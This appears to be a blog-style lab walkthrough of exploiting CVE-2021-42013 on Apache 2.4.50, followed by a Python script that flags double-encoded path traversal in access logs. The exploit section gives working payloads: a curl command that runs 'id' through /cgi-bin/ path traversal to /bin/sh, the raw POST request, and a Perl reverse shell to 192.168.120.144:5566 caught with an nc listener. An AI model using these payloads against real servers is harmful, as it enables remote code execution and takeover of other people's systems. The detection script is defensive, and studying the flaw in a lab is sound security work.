CVE_2021_42013

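1. Check the middleware information

Sometimes the middleware information is visible directly in the browser's developer tools (Inspect):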

As shown, the server is Apache 2.4.50, which is affected by CVE-2021-42013.

2. Testing

Method 1: testing from the shell

payload:

curl --data "echo;id" 'http://192.168.120.133:35846/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

Method 2: sending the request manually

payload:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

Method 3: reverse shell

payload:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

echo;perl -e 'use Socket;$ip="192.168.120.144";$port=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}'

Listener on Kali:

nc -lvvp 5566

The reverse shell connects successfully!
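
Detection side, as an added example that is not part of the original post: the `.%%32%65` segment in the payloads above decodes first to `.%2e` and then to `..`, so this script percent-decodes each logged request path until it stops changing and flags paths that hide a `..` segment. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Request and status fields of an Apache common/combined log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_until_stable(path, max_rounds=5):
    """Percent-decode repeatedly; return (final_path, rounds_that_changed_it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def inspect_line(line):
    """Return a finding dict if the request path hides a '..' segment, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]
    decoded, rounds = decode_until_stable(raw)
    # Only encoded forms are flagged here; a plain '..' is not the pattern on this page.
    if rounds == 0 or ".." not in decoded.split("/"):
        return None
    return {
        "method": m["method"],
        "raw": raw,
        "decoded": decoded,
        "double_encoded": rounds >= 2,   # the .%%32%65 form needs two rounds
        "served": m["status"] == "200",  # a 200 means the request was not rejected
    }

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2024:20:10:41 +0800] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 45',
    '203.0.113.8 - - [12/Dec/2024:20:11:02 +0800] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.9 - - [12/Dec/2024:20:11:30 +0800] "GET /docs/100%25-coverage.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Dec/2024:20:12:15 +0800] "GET /icons/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
]

def scan(lines):
    """Run inspect_line over every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with both `double_encoded` and `served` set is the one to triage first, since it matches the request shape used in the tests above and was answered with 200.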

posted @ 2025-12-02 09:23  shinianyunyan